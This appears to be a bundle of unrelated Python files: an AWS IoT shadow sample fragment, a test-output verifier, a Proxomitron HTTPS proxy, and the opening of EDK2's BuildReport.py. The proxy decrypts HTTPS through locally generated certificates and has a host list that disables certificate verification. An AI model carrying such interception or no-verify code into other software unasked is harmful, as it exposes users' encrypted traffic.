    client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)

    proxy_options = None
    if (args.proxy_host):
        proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port)

    if args.use_websocket == True:
        # Websocket transport, signed with credentials from the default chain.
        credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap)
        mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing(
            endpoint=args.endpoint,
            client_bootstrap=client_bootstrap,
            region=args.signing_region,
            credentials_provider=credentials_provider,
            http_proxy_options=proxy_options,
            ca_filepath=args.root_ca,
            client_id=args.client_id,
            clean_session=True,
            keep_alive_secs=6)

    else:
        # Mutual-TLS transport using the certificate/key files from the CLI.
        # NOTE(review): keep_alive_secs=6 is unusually aggressive -- confirm intended.
        mqtt_connection = mqtt_connection_builder.mtls_from_path(
            endpoint=args.endpoint,
            cert_filepath=args.cert,
            pri_key_filepath=args.key,
            client_bootstrap=client_bootstrap,
            ca_filepath=args.root_ca,
            client_id=args.client_id,
            clean_session=True,
            keep_alive_secs=6,
            http_proxy_options=proxy_options)

    print("Connecting to {} with client ID '{}'...".format(
        args.endpoint, args.client_id))

    connected_future = mqtt_connection.connect()

    shadow_client = iotshadow.IotShadowClient(mqtt_connection)

    # Wait for connection to be fully established.
    # Note that it's not necessary to wait, commands issued to the
    # mqtt_connection before its fully connected will simply be queued.
    # But this sample waits here so it's obvious when a connection
    # fails or succeeds.
    connected_future.result()
    print("Connected!")

    try:
        # Subscribe to necessary topics.
        # Note that is **is** important to wait for "accepted/rejected" subscriptions
        # to succeed before publishing the corresponding "request".
        print("Subscribing to Update responses...")
        update_accepted_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_accepted(
            request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_update_shadow_accepted)

        update_rejected_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_rejected(
            request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_update_shadow_rejected)

        # Wait for subscriptions to succeed
        update_accepted_subscribed_future.result()
        update_rejected_subscribed_future.result()

        print("Subscribing to Get responses...")
        get_accepted_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_accepted(
            request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_get_shadow_accepted)

        get_rejected_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_rejected(
            request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_get_shadow_rejected)

        # Wait for subscriptions to succeed
        get_accepted_subscribed_future.result()
        get_rejected_subscribed_future.result()

        print("Subscribing to Delta events...")
        delta_subscribed_future, _ = shadow_client.subscribe_to_shadow_delta_updated_events(
            request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE,
            callback=on_shadow_delta_updated)

        # Wait for subscription to succeed
        delta_subscribed_future.result()

        # The rest of the sample runs asyncronously.

        # Issue request for shadow's current state.
        # The response will be received by the on_get_accepted() callback
        print("Requesting current shadow state...")
        publish_get_future = shadow_client.publish_get_shadow(
            request=iotshadow.GetShadowRequest(thing_name=args.thing_name),
            qos=mqtt.QoS.AT_LEAST_ONCE)

        # Ensure that publish succeeds
        publish_get_future.result()

        # Launch thread to handle user input.
        # A "daemon" thread won't prevent the program from shutting down.
        print("Launching thread to read user input...")
        user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread')
        user_input_thread.daemon = True
        user_input_thread.start()

    except Exception as e:
        exit(e)

    # Wait for the sample to finish (user types 'quit', or an error occurs)
    is_sample_done.wait()
|
verifier.py | """Ensure that the output produced by each test program is identical."""
__all__ = [
'Verifier',
]
import pickle
from itertools import groupby
from operator import itemgetter
import os
from multiprocessing import Process
from frexp.workflow import Task
class Verifier(Task):
    """Run each test once and ensure that different progs agree
    on the results.
    """

    # At any given time, we only hold onto the current test result
    # and the one we're trying to match it to. This avoids consuming
    # more memory as the number of tests increases, and it also avoids
    # additional unnecessary serialization work.

    # TODO: If it turns out that equality comparison among large sets
    # ends up being a limiting factor, we can turn this into a hash-
    # based or sort-based equality. This would probably require a
    # recursive traversal, similar to how canonization is done.

    # Copied from Runner, should refactor.
    def dispatch_test(self, dataset, prog, other_tparams):
        """Spawn a driver process and get its result."""
        # Communicate the dataset and results via a temporary
        # pipe file: we write the inputs, the child overwrites the
        # file with its results.
        pipe_fn = self.workflow.pipe_filename
        with open(pipe_fn, 'wb') as pf:
            pickle.dump((dataset, prog, other_tparams), pf)

        child = Process(target=self.workflow.ExpVerifyDriver, args=(pipe_fn,))
        child.start()
        child.join()

        with open(pipe_fn, 'rb') as pf:
            results = pickle.load(pf)
        os.remove(pipe_fn)
        return results

    def run(self):
        """Re-run every (tid, prog) pair and compare outputs within each
        trial group, reporting the first disagreement found."""
        with open(self.workflow.params_filename, 'rb') as in_file:
            tparams_list = pickle.load(in_file)
        # Determine which tests were actually run (i.e. didn't time out).
        with open(self.workflow.data_filename, 'rb') as in_file:
            datapoints = pickle.load(in_file)
        datapoint_tidprogs = set((d['tid'], d['prog']) for d in datapoints)

        # groupby() needs its input sorted by the same key.
        tparams_list.sort(key=itemgetter('tid'))
        tgroups = groupby(tparams_list, itemgetter('tid'))
        tgroups = [(tid, list(tgs)) for tid, tgs in tgroups]

        # Count from 1 so progress reads "1/N".."N/N" rather than "0/N".
        for i, (tid, tgs) in enumerate(tgroups, 1):
            itemstr = 'Verifying trial group {:<10} ({}/{})\n    '.format(
                tid + ' ...', i, len(tgroups))
            self.print(itemstr, end='')

            goal = None      # output of the first prog that ran
            goalprog = None  # name of the prog that produced `goal`
            for trial in tgs:
                trial = dict(trial)
                dsid = trial.pop('dsid')
                prog = trial.pop('prog')

                # Skip if this one timed out.
                # Use self.print (not bare print) so the notice goes to the
                # same stream as the rest of the report.
                if (tid, prog) not in datapoint_tidprogs:
                    self.print('Skipping ' + prog, end=' ')
                    continue

                self.print(prog, end=' ')
                ds_fn = self.workflow.get_ds_filename(dsid)
                with open(ds_fn, 'rb') as dsfile:
                    dataset = pickle.load(dsfile)
                output = self.dispatch_test(dataset, prog, trial)['output']

                if goal is None:
                    goal = output
                    goalprog = prog
                else:
                    if output != goal:
                        self.print()
                        self.print('Output disagrees for trial group ' + tid)
                        self.print('  params: ' + str(dataset['dsparams']))
                        self.print('  goalprog: {}, prog: {}'.format(
                            goalprog, prog))
                        return
            self.print()

        self.print('Output agrees on all datasets.')
        self.print('Done.')
|
ProxHTTPSProxy.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"A Proxomitron Helper Program"
_name = 'ProxHTTPSProxyMII'
__author__ = 'phoenix'
__version__ = 'v1.5'
CONFIG = "/etc/ProxHTTPSProxy/config/config.ini"
CA_CERTS = "/etc/ProxHTTPSProxy/cert/cacert.pem"
import os
import time
import configparser
import fnmatch
import logging
import threading
import ssl
import urllib3
from urllib3.contrib.socks import SOCKSProxyManager
#https://urllib3.readthedocs.org/en/latest/security.html#insecurerequestwarning
#urllib3.disable_warnings()
from socketserver import ThreadingMixIn
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse
from ProxyTool import ProxyRequestHandler, get_cert, counter
from colorama import init, Fore, Back, Style
init(autoreset=True)
class LoadConfig:
    """Parse the [GENERAL] section of the main INI file into attributes."""

    def __init__(self, configfile):
        """Read *configfile* and expose the general settings.

        Attributes: PROXADDR, FRONTPORT, REARPORT, DEFAULTPROXY, LOGLEVEL.
        Ports are converted to int; the rest stay strings (None if absent).
        """
        parser = configparser.ConfigParser(allow_no_value=True,
                                           inline_comment_prefixes=('#',))
        parser.read(configfile)
        self.config = parser
        general = parser['GENERAL']
        self.PROXADDR = general.get('ProxAddr')
        self.FRONTPORT = int(general.get('FrontPort'))
        self.REARPORT = int(general.get('RearPort'))
        self.DEFAULTPROXY = general.get('DefaultProxy')
        self.LOGLEVEL = general.get('LogLevel')
class ConnectionPools:
    """
    self.pools is a list of {'proxy': 'http://127.0.0.1:8080',
                             'pool': urllib3.ProxyManager() object,
                             'patterns': ['ab.com', 'bc.net', ...]}

    self.getpool() is a method that returns pool based on host matching

    Each 'pool' value is actually a 2-element list:
    index 0 = certificate-verifying pool, index 1 = no-verify pool.
    """
    # Windows default CA certificates are incomplete
    # See: http://bugs.python.org/issue20916
    # cacert.pem sources:
    # - http://curl.haxx.se/docs/caextract.html
    # - http://certifi.io/en/latest/

    # ssl_version="TLSv1" to specific version
    sslparams = dict(cert_reqs="REQUIRED", ca_certs=CA_CERTS)
    # IE: http://support2.microsoft.com/kb/181050/en-us
    # Firefox about:config
    # network.http.connection-timeout 90
    # network.http.response.timeout 300
    timeout = urllib3.util.timeout.Timeout(connect=90.0, read=300.0)

    def __init__(self, config):
        # Remember the file and its mtime so reloadConfig() can detect edits.
        self.file = config
        self.file_timestamp = os.path.getmtime(config)
        self.loadConfig()

    def loadConfig(self):
        """(Re)build pools and match lists from the INI file."""
        # self.conf has to be inited each time for reloading
        self.conf = configparser.ConfigParser(allow_no_value=True, delimiters=('=',),
                                              inline_comment_prefixes=('#',))
        self.conf.read(self.file)
        self.pools = []
        # Sections named like "PROXY <address>" define per-pattern proxies.
        proxy_sections = [section for section in self.conf.sections()
                          if section.startswith('PROXY')]
        for section in proxy_sections:
            proxy = section.split()[1]
            self.pools.append(dict(proxy=proxy,
                                   pool=self.setProxyPool(proxy),
                                   patterns=list(self.conf[section].keys())))
        # Catch-all entry appended last so getpool() always finds a match.
        default_proxy = self.conf['GENERAL'].get('DefaultProxy')
        default_pool = (self.setProxyPool(default_proxy) if default_proxy else
                        [urllib3.PoolManager(num_pools=10, maxsize=8, timeout=self.timeout, **self.sslparams),
                         urllib3.PoolManager(num_pools=10, maxsize=8, timeout=self.timeout)])
        self.pools.append({'proxy': default_proxy, 'pool': default_pool, 'patterns': '*'})

        self.noverifylist = list(self.conf['SSL No-Verify'].keys())
        self.blacklist = list(self.conf['BLACKLIST'].keys())
        self.sslpasslist = list(self.conf['SSL Pass-Thru'].keys())
        self.bypasslist = list(self.conf['BYPASS URL'].keys())

    def reloadConfig(self):
        """Poll the config file once per second and reload it on change.

        Runs forever; started as a daemon thread in the main script.
        """
        while True:
            mtime = os.path.getmtime(self.file)
            if mtime > self.file_timestamp:
                self.file_timestamp = mtime
                self.loadConfig()
                logger.info(Fore.RED + Style.BRIGHT
                            + "*" * 20 + " CONFIG RELOADED " + "*" * 20)
            time.sleep(1)

    def getpool(self, host, httpmode=False):
        """Return (proxy, pool, noverify) for *host*.

        The bool `noverify` doubles as a 0/1 index into the pool pair.
        The '*' catch-all entry guarantees a match, so this never returns None.
        """
        noverify = True if httpmode or any((fnmatch.fnmatch(host, pattern) for pattern in self.noverifylist)) else False
        for pool in self.pools:
            if any((fnmatch.fnmatch(host, pattern) for pattern in pool['patterns'])):
                return pool['proxy'], pool['pool'][noverify], noverify

    def setProxyPool(self, proxy):
        """Build the [verify, no-verify] manager pair for a proxy address."""
        scheme = proxy.split(':')[0]
        if scheme in ('http', 'https'):
            ProxyManager = urllib3.ProxyManager
        elif scheme in ('socks4', 'socks5'):
            ProxyManager = SOCKSProxyManager
        else:
            # Unsupported scheme: tell the operator and bail out (input()
            # keeps the console window open on Windows).
            print("Wrong Proxy Format: " + proxy)
            print("Proxy should start with http/https/socks4/socks5 .")
            input()
            raise SystemExit
        # maxsize is the max. number of connections to the same server
        return [ProxyManager(proxy, num_pools=10, maxsize=8, timeout=self.timeout, **self.sslparams),
                ProxyManager(proxy, num_pools=10, maxsize=8, timeout=self.timeout)]
class FrontServer(ThreadingMixIn, HTTPServer):
    """Handle requests in a separate thread."""
    # Client-facing listener (bound to FRONTPORT in the main script);
    # requests are handled by FrontRequestHandler.
    pass
class RearServer(ThreadingMixIn, HTTPServer):
    """Handle requests in a separate thread."""
    # Upstream-facing listener (bound to REARPORT in the main script);
    # requests are handled by RearRequestHandler.
    pass
class FrontRequestHandler(ProxyRequestHandler):
    """
    Sit between the client and Proxomitron
    Convert https request to http
    """
    server_version = "%s FrontProxy/%s" % (_name, __version__)

    def do_CONNECT(self):
        "Decrypt https request and dispatch to http handler"
        # request line: CONNECT www.example.com:443 HTTP/1.1
        self.host, self.port = self.path.split(":")
        self.proxy, self.pool, self.noverify = pools.getpool(self.host)
        if any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.blacklist)):
            # BLACK LIST
            self.deny_request()
            logger.info("%03d " % self.reqNum + Fore.CYAN + 'Denied by blacklist: %s' % self.host)
        elif any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.sslpasslist)):
            # SSL Pass-Thru: relay bytes without decrypting, via the matched
            # upstream proxy if one is configured, else directly.
            if self.proxy and self.proxy.startswith('https'):
                self.forward_to_https_proxy()
            elif self.proxy and self.proxy.startswith('socks5'):
                self.forward_to_socks5_proxy()
            else:
                self.tunnel_traffic()
            # Upstream server or proxy of the tunnel is closed explictly, so we close the local connection too
            self.close_connection = 1
        else:
            # SSL MITM: accept the CONNECT, then re-handshake with the client
            # using a locally generated certificate for the target host.
            self.wfile.write(("HTTP/1.1 200 Connection established\r\n" +
                              "Proxy-agent: %s\r\n" % self.version_string() +
                              "\r\n").encode('ascii'))
            # commonname = '.' + self.host.partition('.')[-1] if self.host.count('.') >= 2 else self.host
            commonname = self.host
            dummycert = get_cert(commonname)
            # set a flag for do_METHOD
            self.ssltunnel = True

            ssl_sock = ssl.wrap_socket(self.connection, keyfile=dummycert, certfile=dummycert, server_side=True)
            # Ref: Lib/socketserver.py#StreamRequestHandler.setup()
            self.connection = ssl_sock
            self.rfile = self.connection.makefile('rb', self.rbufsize)
            self.wfile = self.connection.makefile('wb', self.wbufsize)
            # dispatch to do_METHOD()
            self.handle_one_request()

    def do_METHOD(self):
        "Forward request to Proxomitron"
        counter.increment_and_set(self, 'reqNum')
        if self.ssltunnel:
            # https request (arriving through the decrypted MITM tunnel)
            host = self.host if self.port == '443' else "%s:%s" % (self.host, self.port)
            url = "https://%s%s" % (host, self.path)
            self.bypass = any((fnmatch.fnmatch(url, pattern) for pattern in pools.bypasslist))
            if not self.bypass:
                # Downgrade to http so Proxomitron can filter it; the rear
                # server upgrades it back to https.
                url = "http://%s%s" % (host, self.path)
                # Tag the request so Proxomitron can recognize it
                self.headers["Tagged"] = self.version_string() + ":%d" % self.reqNum
        else:
            # http request
            self.host = urlparse(self.path).hostname
            if any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.blacklist)):
                # BLACK LIST
                self.deny_request()
                logger.info("%03d " % self.reqNum + Fore.CYAN + 'Denied by blacklist: %s' % self.host)
                return
            host = urlparse(self.path).netloc
            self.proxy, self.pool, self.noverify = pools.getpool(self.host, httpmode=True)
            self.bypass = any((fnmatch.fnmatch('http://' + host + urlparse(self.path).path, pattern) for pattern in pools.bypasslist))
            url = self.path
        self.url = url
        # Bypassed requests go straight upstream; others go via Proxomitron.
        pool = self.pool if self.bypass else proxpool
        data_length = self.headers.get("Content-Length")
        self.postdata = self.rfile.read(int(data_length)) if data_length and int(data_length) > 0 else None
        if self.command == "POST" and "Content-Length" not in self.headers:
            # Drain any chunked/unterminated body so the connection isn't wedged.
            buffer = self.rfile.read()
            if buffer:
                logger.warning("%03d " % self.reqNum + Fore.RED +
                               'POST w/o "Content-Length" header (Bytes: %d | Transfer-Encoding: %s | HTTPS: %s',
                               len(buffer), "Transfer-Encoding" in self.headers, self.ssltunnel)
        # Remove hop-by-hop headers
        self.purge_headers(self.headers)
        r = None

        # Below code in connectionpool.py expect the headers to has a copy() and update() method
        # That's why we can't use self.headers directly when call pool.urlopen()
        #
        # Merge the proxy headers. Only do this in HTTP. We have to copy the
        # headers dict so we can safely change it without those changes being
        # reflected in anyone else's copy.
        # if self.scheme == 'http':
        #     headers = headers.copy()
        #     headers.update(self.proxy_headers)
        headers = urllib3._collections.HTTPHeaderDict(self.headers)

        try:
            # Sometimes 302 redirect would fail with "BadStatusLine" exception, and IE11 doesn't restart the request.
            # retries=1 instead of retries=False fixes it.
            #! Retry may cause the requests with the same reqNum appear in the log window
            r = pool.urlopen(self.command, url, body=self.postdata, headers=headers,
                             retries=1, redirect=False, preload_content=False, decode_content=False)
            if not self.ssltunnel:
                # Log prefix: [BP]=bypass via proxy, [BD]=bypass direct, [D]=direct.
                if self.bypass:
                    prefix = '[BP]' if self.proxy else '[BD]'
                else:
                    prefix = '[D]'
                if self.command in ("GET", "HEAD"):
                    logger.info("%03d " % self.reqNum + Fore.MAGENTA + '%s "%s %s" %s %s' %
                                (prefix, self.command, url, r.status, r.getheader('Content-Length', '-')))
                else:
                    logger.info("%03d " % self.reqNum + Fore.MAGENTA + '%s "%s %s %s" %s %s' %
                                (prefix, self.command, url, data_length, r.status, r.getheader('Content-Length', '-')))

            self.send_response_only(r.status, r.reason)
            # HTTPResponse.msg is easier to handle than urllib3._collections.HTTPHeaderDict
            r.headers = r._original_response.msg
            self.purge_write_headers(r.headers)

            # Responses that by definition carry no body are not streamed.
            if self.command == 'HEAD' or r.status in (100, 101, 204, 304) or r.getheader("Content-Length") == '0':
                written = None
            else:
                written = self.stream_to_client(r)
                if "Content-Length" not in r.headers and 'Transfer-Encoding' not in r.headers:
                    # No framing info: end of body can only be signalled by close.
                    self.close_connection = 1

        # Intend to catch regular http and bypass http/https requests exceptions
        # Regular https request exceptions should be handled by rear server
        except urllib3.exceptions.TimeoutError as e:
            self.sendout_error(url, 504, message="Timeout", explain=e)
            logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[F] %s on "%s %s"', e, self.command, url)
        except (urllib3.exceptions.HTTPError,) as e:
            self.sendout_error(url, 502, message="HTTPError", explain=e)
            logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[F] %s on "%s %s"', e, self.command, url)
        finally:
            if r:
                # Release the connection back into the pool
                r.release_conn()

    do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = do_METHOD
class RearRequestHandler(ProxyRequestHandler):
    """
    Supposed to be the parent proxy for Proxomitron for tagged requests
    Convert http request to https
    """
    server_version = "%s RearProxy/%s" % (_name, __version__)

    def do_METHOD(self):
        "Convert http request to https"
        # Only requests tagged by FrontRequestHandler are accepted; the tag
        # also carries the request number used for log correlation.
        if self.headers.get("Tagged") and self.headers["Tagged"].startswith(_name):
            self.reqNum = int(self.headers["Tagged"].split(":")[1])
            # Remove the tag
            del self.headers["Tagged"]
        else:
            self.sendout_error(self.path, 400,
                               explain="The proxy setting of the client is misconfigured.\n\n" +
                               "Please set the HTTPS proxy port to %s " % config.FRONTPORT +
                               "and check the Docs for other settings.")
            logger.error(Fore.RED + Style.BRIGHT + "[Misconfigured HTTPS proxy port] " + self.path)
            return

        # request line: GET http://somehost.com/path?attr=value HTTP/1.1
        # Upgrade the scheme back to https ("http" -> "https" + rest of URL).
        url = "https" + self.path[4:]
        self.host = urlparse(self.path).hostname
        proxy, pool, noverify = pools.getpool(self.host)
        prefix = '[P]' if proxy else '[D]'
        data_length = self.headers.get("Content-Length")
        self.postdata = self.rfile.read(int(data_length)) if data_length else None
        self.purge_headers(self.headers)
        r = None

        # Below code in connectionpool.py expect the headers to has a copy() and update() method
        # That's why we can't use self.headers directly when call pool.urlopen()
        #
        # Merge the proxy headers. Only do this in HTTP. We have to copy the
        # headers dict so we can safely change it without those changes being
        # reflected in anyone else's copy.
        # if self.scheme == 'http':
        #     headers = headers.copy()
        #     headers.update(self.proxy_headers)
        headers = urllib3._collections.HTTPHeaderDict(self.headers)

        try:
            r = pool.urlopen(self.command, url, body=self.postdata, headers=headers,
                             retries=1, redirect=False, preload_content=False, decode_content=False)
            if proxy:
                logger.debug('Using Proxy - %s' % proxy)
            # Red log line signals the certificate was NOT verified.
            color = Fore.RED if noverify else Fore.GREEN
            if self.command in ("GET", "HEAD"):
                logger.info("%03d " % self.reqNum + color + '%s "%s %s" %s %s' %
                            (prefix, self.command, url, r.status, r.getheader('Content-Length', '-')))
            else:
                logger.info("%03d " % self.reqNum + color + '%s "%s %s %s" %s %s' %
                            (prefix, self.command, url, data_length, r.status, r.getheader('Content-Length', '-')))

            self.send_response_only(r.status, r.reason)
            # HTTPResponse.msg is easier to handle than urllib3._collections.HTTPHeaderDict
            r.headers = r._original_response.msg
            self.purge_write_headers(r.headers)

            # Responses that by definition carry no body are not streamed.
            if self.command == 'HEAD' or r.status in (100, 101, 204, 304) or r.getheader("Content-Length") == '0':
                written = None
            else:
                written = self.stream_to_client(r)
                if "Content-Length" not in r.headers and 'Transfer-Encoding' not in r.headers:
                    # No framing info: end of body can only be signalled by close.
                    self.close_connection = 1

        except urllib3.exceptions.SSLError as e:
            self.sendout_error(url, 417, message="SSL Certificate Failed", explain=e)
            logger.error("%03d " % self.reqNum + Fore.RED + Style.BRIGHT + "[SSL Certificate Error] " + url)
        except urllib3.exceptions.TimeoutError as e:
            self.sendout_error(url, 504, message="Timeout", explain=e)
            logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[R]%s "%s %s" %s', prefix, self.command, url, e)
        except (urllib3.exceptions.HTTPError,) as e:
            self.sendout_error(url, 502, message="HTTPError", explain=e)
            logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[R]%s "%s %s" %s', prefix, self.command, url, e)
        finally:
            if r:
                # Release the connection back into the pool
                r.release_conn()

    do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = do_METHOD
"""
#Information#
* Python default ciphers: http://bugs.python.org/issue20995
* SSL Cipher Suite Details of Your Browser: https://cc.dcsec.uni-hannover.de/
* https://wiki.mozilla.org/Security/Server_Side_TLS
"""
# Bootstrap: load config, set up logging, build connection pools, start both
# servers plus the config-reload poller as daemon threads, then idle until
# Ctrl-C.
try:
    if os.name == 'nt':
        # Cosmetic: name the console window on Windows.
        import ctypes
        ctypes.windll.kernel32.SetConsoleTitleW('%s %s' % (_name, __version__))
    config = LoadConfig(CONFIG)

    logger = logging.getLogger(__name__)
    logger.setLevel(getattr(logging, config.LOGLEVEL, logging.INFO))
    handler = logging.StreamHandler()
    formatter = logging.Formatter('%(asctime)s %(message)s', datefmt='[%H:%M]')
    handler.setFormatter(formatter)
    logger.addHandler(handler)

    pools = ConnectionPools(CONFIG)
    # Pool used for requests routed through Proxomitron itself.
    proxpool = urllib3.ProxyManager(config.PROXADDR, num_pools=10, maxsize=8,
                                    # A little longer than timeout of rear pool
                                    # to avoid trigger front server exception handler
                                    timeout=urllib3.util.timeout.Timeout(connect=90.0, read=310.0))

    frontserver = FrontServer(('', config.FRONTPORT), FrontRequestHandler)
    rearserver = RearServer(('', config.REARPORT), RearRequestHandler)
    # Daemon threads: process exit is driven by the main loop below.
    for worker in (frontserver.serve_forever, rearserver.serve_forever,
                   pools.reloadConfig):
        thread = threading.Thread(target=worker)
        thread.daemon = True
        thread.start()

    print("=" * 76)
    print('%s %s (urllib3/%s)' % (_name, __version__, urllib3.__version__))
    print()
    print('  FrontServer  : localhost:%s' % config.FRONTPORT)
    print('  RearServer   : localhost:%s' % config.REARPORT)
    print('  ParentServer : %s' % config.DEFAULTPROXY)
    print('  Proxomitron  : ' + config.PROXADDR)
    print("=" * 76)
    # Keep the main thread alive so Ctrl-C can be caught.
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    print("Quitting...")
|
BuildReport.py | ## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import StringIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
# The %(Address)s placeholders are substituted below to build gMapFileItemPattern.
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
# EDK-style include macro form, e.g. #include EFI_PPI_CONSUMER(Name)
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
    TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
    TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
    TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
    TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
    TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
    TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
    TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
    TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
    TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
    }
## The look up table to map module type to driver type
gDriverTypeMap = {
    SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
    SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
    SUP_MODULE_PEIM : '0x6 (PEIM)',
    SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
    SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
    SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
    SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
    SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
    SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
    SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
    SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
    'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
    SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
    SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
    }
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wrap the string for better readability.
#
# @File    The file object to write
# @String  The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
    if Wrapper:
        # Wrap to the shared report line width rather than a duplicated
        # magic number (gLineMaxLength is 120).
